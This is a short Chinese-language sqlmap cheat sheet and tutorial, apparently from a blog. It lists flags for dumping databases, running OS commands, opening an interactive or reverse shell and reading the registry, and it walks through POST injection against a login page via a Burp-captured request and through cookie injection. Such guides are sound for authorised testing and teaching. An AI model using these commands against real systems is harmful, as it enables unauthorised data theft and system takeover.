基本用法:
--dbs 查询数据库
--current--db 获取当前数据库名称
--current--user 获得用户
--tables -D “数据库” // 列举数据库的表名
--columns -T “表名” -D “数据库” // 获取表的列名
--dump -C “字段,字段” -T “表名” -D “数据库” // 获取表中的数据,包含列
–privileges / 查看权限
privileges -U root / 查看用户权限
–roles / 枚举数据库用户角色
--proxy "http://127.0.0.1:8080" 代理注入
--sql-query=xx 要执行的SQL语句
--sql-shell 提示交互式 SQL 的 shell
--os-cmd=xxx执行操作系统命令
--os-shell 交互式的操作系统的 shell
--os-pwn 反弹shell
--reg-read 读取win系统注册表
--dbs-o "sqlmap.log" 保存进度
--dbs-o "sqlmap.log" -resume 恢复已保存进度
POST注入
1. 浏览器打开目标地址http:// blog.websafe3.org /Login.asp
2. 配置burp代理(127.0.0.1:8080)以拦截请求
3. 点击login表单的submit按钮
4. 这时候Burp会拦截到了我们的登录POST请求
5. 把这个post请求复制为txt, 我这命名为search-test.txt 然后把它放至sqlmap目录下
6. 运行sqlmap并使用如下命令:
./sqlmap.py -r search-test.txt -p tfUPass
这里参数-r 是让sqlmap加载我们的post请求rsearch-test.txt,
而-p 大家应该比较熟悉,指定注入用的参数。
COOKIES注入
sqlmap.py -u "http://127.0.0.1/base.php" --cookies "id=1" --dbs --level 2
默认情况下SQLMAP只支持GET/POST参数的注入测试,但是当使用--level 参数且数值>=2的时候也会检查 cookie时面的参数,当>=3的时候将检查User-agent和Referer,那么这就很简单了,我们直接在原有的基础上面加上 --level 2 即可